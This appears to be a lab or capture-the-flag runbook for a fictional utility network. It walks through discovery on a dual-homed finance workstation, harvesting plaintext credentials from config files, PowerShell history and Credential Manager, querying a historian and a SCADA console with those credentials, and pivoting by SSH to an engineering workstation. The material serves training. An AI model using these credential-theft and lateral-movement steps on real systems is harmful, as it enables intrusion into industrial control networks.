Runbook: bursar-desk¶
Identity and domain¶
Establish who you are and what domain you are in before moving on.
PS C:\Users\bursardesk> whoami
PS C:\Users\bursardesk> hostname
PS C:\Users\bursardesk> systeminfo
PS C:\Users\bursardesk> whoami /groups
PS C:\Users\bursardesk> net localgroup Administrators
systeminfo confirms UUPL domain membership and Windows 10 build. whoami /groups shows
domain membership. net localgroup Administrators shows bursardesk has local admin.
Network discovery¶
The dual-homed NIC is the key finding. Establish it early.
PS C:\Users\bursardesk> ipconfig /all
Two adapters: Ethernet 0 at 10.10.1.20 (enterprise) and Ethernet 1 at 10.10.2.100 (operational). Each shows a Physical Address field with the real hardware MAC. The second NIC is the pivot point.
PS C:\Users\bursardesk> route print
The IPv4 table shows a route to 10.10.2.0/24 via 10.10.2.100. This confirms direct access to the operational network without going through the engineering workstation.
PS C:\Users\bursardesk> arp -a
ARP cache bucketed by interface. Entries in the 10.10.2.x range confirm the machine has already talked to operational hosts.
PS C:\Users\bursardesk> netstat
Active connections. Check for established sessions to 10.10.2.10 (historian) or 10.10.2.20 (SCADA).
PS C:\Users\bursardesk> ping 10.10.2.10
PS C:\Users\bursardesk> ping 10.10.2.20
PS C:\Users\bursardesk> ping 10.10.2.30
Historian, SCADA, and engineering workstation are all reachable via the operational NIC.
File hunting¶
The Windows user profile is the primary loot surface. Start recursive.
PS C:\Users\bursardesk> dir /s *.conf
Returns AppData\Roaming\UUPLOps\ops-access.conf: plaintext credentials for historian and SCADA.
PS C:\Users\bursardesk> dir /s *.ps1
Returns Desktop\pull_monthly_report.ps1: scheduled script with hard-coded historian password.
PS C:\Users\bursardesk> dir /s *.csv
Returns reports\turbine_2024-01.csv through turbine_2024-03.csv: turbine telemetry pulled monthly from the historian. The timestamps and values in these files confirm the historian is live.
PS C:\Users\bursardesk> dir Documents\
PS C:\Users\bursardesk> dir Desktop\
PS C:\Users\bursardesk> dir AppData\Roaming\UUPLOps\
PS C:\Users\bursardesk> dir AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
PS C:\Users\bursardesk> dir reports\
Walk the profile manually after the recursive dump. The UUPLOps and PSReadLine directories are the most productive.
Credential discovery¶
Read the credential files directly¶
PS C:\Users\bursardesk> type AppData\Roaming\UUPLOps\ops-access.conf
historian / Historian2015 and admin / admin (SCADA web console). Written in 2019, never rotated.
PS C:\Users\bursardesk> type Desktop\pull_monthly_report.ps1
Hard-coded $Pass = “Historian2015”. The script calls /report on the historian and saves the result to reports\turbine_YYYY-MM.csv. The reports in the profile were generated by exactly this.
Scrape with findstr¶
PS C:\Users\bursardesk> findstr /i pass AppData\Roaming\UUPLOps\ops-access.conf
Returns all lines containing “pass”: the historian and SCADA credential entries.
PS C:\Users\bursardesk> findstr /si pass AppData\Roaming\UUPLOps\ops-access.conf
/si combines case-insensitive with recursive subdirectory search.
Windows Credential Manager¶
PS C:\Users\bursardesk> cmdkey /list
Shows saved credentials. Expect an entry for uupl-historian (10.10.2.10), populated when the monthly report script ran interactively.
PowerShell history¶
The equivalent of .bash_history. Almost always revealing.
PS C:\Users\bursardesk> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
The history contains:
Invoke-WebRequestto http://10.10.2.10:8080/report with a Basic auth header encoded as Base64ssh engineer@10.10.2.30(engineering workstation session)nmap -sn 10.10.2.0/24(the user already scanned the operational segment)ping 10.10.2.10
The Base64 string in the Invoke-WebRequest line decodes to historian:Historian2015. The same
credential is in ops-access.conf; the history is a second source and shows the credential in use
against the exact endpoint the monthly report script calls.
Scheduled tasks and processes¶
PS C:\Users\bursardesk> schtasks /query
Returns the MonthlyReport task: the scheduled pull_monthly_report.ps1 run on the 1st of each month.
PS C:\Users\bursardesk> tasklist
Running processes. python.exe present confirms background scripts; svchost and powershell are expected.
PS C:\Users\bursardesk> Get-PSDrive
Drive list. C: is the local profile. No mapped drives pre-configured.
Live service verification¶
Use the credentials found in the profile against real services.
PS C:\Users\bursardesk> iwr -Uri http://10.10.2.10:8080/assets -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Returns the historian tag list: one metric name per line (frequency_hz_x10, line_current_a, turbine_rpm, turbine_temperature, etc.). Confirms the credential works and the historian is reachable directly from the operational NIC. The Base64 string is historian:Historian2015.
PS C:\Users\bursardesk> iwr -Uri "http://10.10.2.10:8080/report?asset=turbine_rpm&from=<YYYY-MM>-01&to=<YYYY-MM>-28" -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Returns CSV with headers (timestamp,value,unit) and data rows. Use the current month for
<YYYY-MM>: the historian seeds 30 days of data back from startup, so recent months have
rows. This is the same query pull_monthly_report.ps1 runs with its default $Month value.
PS C:\Users\bursardesk> iwr -Uri http://10.10.2.20:8080/ -Headers @{Authorization="Basic YWRtaW46YWRtaW4="}
Returns the distribution-SCADA dashboard HTML. Credential is admin / admin (from ops-access.conf). The Base64 string is admin:admin.
Known hosts¶
PS C:\Users\bursardesk> type .ssh\known_hosts
Fingerprints for 10.10.2.10 (historian), 10.10.2.20 (SCADA), and 10.10.2.30 (engineering workstation). These confirm which hosts bursardesk has connected to before. SSH to any of them will not prompt for a host verification.
Pivot options¶
With a shell on 10.10.2.100, the operational network is directly reachable without touching the engineering workstation or the enterprise-to-operational firewall.
PS C:\Users\bursardesk> ssh engineer@10.10.2.30
Password: spanner99 (from hex-legacy-1 ENGINEER.LOG). The known_hosts entry confirms this connection has been made before.
PS C:\Users\bursardesk> iwr -Uri "http://10.10.2.10:8080/report?asset=turbine_rpm&from=<YYYY-MM>-01&to=<YYYY-MM>-28" -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="}
Historian data without relaying through any other machine. URL quoted to prevent the shell splitting on the &.
SCADA at 10.10.2.20 and engineering workstation at 10.10.2.30 are both one hop from 10.10.2.100.
What makes this realistic¶
A corporate workstation that accumulated operational access through individually reasonable decisions. The finance department needed monthly turbine reports. Credentials were hard-coded because that was quicker. The script ran automatically; nobody revoked the access when the temporary arrangement became permanent.
The dual-homed NIC is the architectural tell. route print on a finance workstation showing a
10.10.2.0/24 route is the moment a participant confirms this is not an ordinary corporate machine.
No execution policy blocks. No UAC prompts. The credentials are in plaintext files in the user profile, as they have been since 2019.
Quick reference¶
whoami /groups domain membership
ipconfig /all both NICs: 10.10.1.20 + 10.10.2.100
route print confirm 10.10.2.0 route (key finding)
arp -a recent operational contacts
dir /s *.conf find ops-access.conf
dir /s *.ps1 find pull_monthly_report.ps1
type AppData\Roaming\UUPLOps\ops-access.conf historian + SCADA credentials
type Desktop\pull_monthly_report.ps1 hard-coded historian password
type ...\PSReadLine\ConsoleHost_history.txt command history (Base64 creds visible)
findstr /i pass AppData\Roaming\UUPLOps\ops-access.conf credential scrape
cmdkey /list saved Windows credentials
schtasks /query monthly report task
ping 10.10.2.10 historian reachable via operational NIC
iwr -Uri http://10.10.2.10:8080/assets -Headers @{Authorization="Basic aGlzdG9yaWFuOkhpc3RvcmlhbjIwMTU="} live historian query
iwr -Uri http://10.10.2.20:8080/ -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} distribution-SCADA dashboard (admin:admin)
ssh engineer@10.10.2.30 pivot to engineering workstation (spanner99)